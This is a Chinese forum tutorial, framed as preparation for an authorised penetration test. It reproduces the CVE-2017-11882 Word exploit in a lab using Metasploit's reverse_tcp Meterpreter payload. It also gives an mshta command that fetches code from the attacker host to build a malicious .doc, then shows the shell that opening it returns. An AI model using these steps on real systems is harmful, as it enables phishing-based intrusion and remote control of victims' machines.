用户
搜索
  • TA的每日心情

    2021-2-22 16:53
  • 签到天数: 7 天

    连续签到: 1 天

    [LV.3]经常看看I

    i春秋-呆萌菜鸟

    交流学习公众号:黑客街

    Rank: 1

    1

    主题

    3

    帖子

    131

    魔法币
    收听
    0
    粉丝
    0
    注册时间
    2021-1-26
    黑客街_洞洞幺 i春秋-呆萌菜鸟 交流学习公众号:黑客街 楼主
    发表于 2021-1-27 16:46:50 23885
    本帖最后由 黑客街_洞洞幺 于 2021-1-28 07:36 编辑

    一次授权的渗透测试行动中,甲方老板拉着要参观下他们的安全服务做的有多好多好(手动滑稽,拉我来做近源渗透那!),在参观到一个办公区域时,发现有台WIN7的主机,桌面上晃眼的一排office2016,哈哈刚从表哥那学到的Word钓鱼不会这次就能用上了吗?
    说干就干,回来之后先复现一下练练手,为马上要开始的工作打个底。

    准备工作:
    攻击机:Kali linux(IP:192.168.3.120)
    靶机:WIN 7 (安装office 2016)
    Office2016安装包可以去MSDN下载
    复现过程:
    一,下载文件:
    把下载的cve_2017_11882.rb文件放入metasploit目录中(:MSFCVE后面为_下划线才能识别)

    1.png
    把下载的cve_2017_11882.rtf目录中(不放的话执行exploit可能会运行失败)
    2.png
    二,开始操作
    打开神器MSF
    3.png
    使用命令searchcve_2017_11882 查找对应的模块(如果没有搜索到使用指令:reload_all重新载入所有模块)
    4.png
    使用命令:use exploit/windows/smb/cve_2017_11882            
    5.png
    设置payload为反弹tcpset payloadwindows/meterpreter/reverse_tcp  
    6.png
    使用命令setlhost 192.168.3.120
    (攻击机的ip)
    7.png
    使用命令:setURIPATH test
    设置URI的路径(注:这里设置的路径test,下面使用python脚本生成doc的时候也要加上这个路径)
    8.png
    检查配置,showoptions
    9.png
    运行,exploit-j
    10.png
    Command109b_CVE-2017-11882.py复制到kal攻击机上并在文件所在位置右键打开一个终端,
    11.png
    运行命令:
    python Command109b_CVE-2017-11882.py -c"mshta http://192.168.3.120:8080/test" -o test4.doc  
    此时已经在目录下生成了doc文件了。
    12.png
    将文件复制到安装好office的靶机上,打开!
    13.png
    靶机打开doc文件后没有任何异常,回到kali攻击机上,
    14.png
    已经建立了会话了,使用命令:sessions -I  进行查看
    15.png
    进入会话:sessions -I 3
    16.png
    此时已经获取了目标机,输入shell
    17.png
    进入到我们熟悉的cmd操作界面了,使用以下指令查看信息
    18.png

    之后就可以通过meterpreter来对shell进行操作了,
    后面为了做内网渗透也可以弹给CobaltStrike来继续下一步的内网渗透了。

    文章内提到的CVE下载链接:
    关注公众号:黑客街 回复:CVE-2017-11882 获取下载链接
    本文由黑客街-洞洞幺编辑发布
    未经授权禁止转载
    4.png
    5.png
    1.png
    2.png
    3.png
    老哥,很社会
    使用道具 举报 回复
    发表于 2021-1-29 10:48:14
    学到了
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册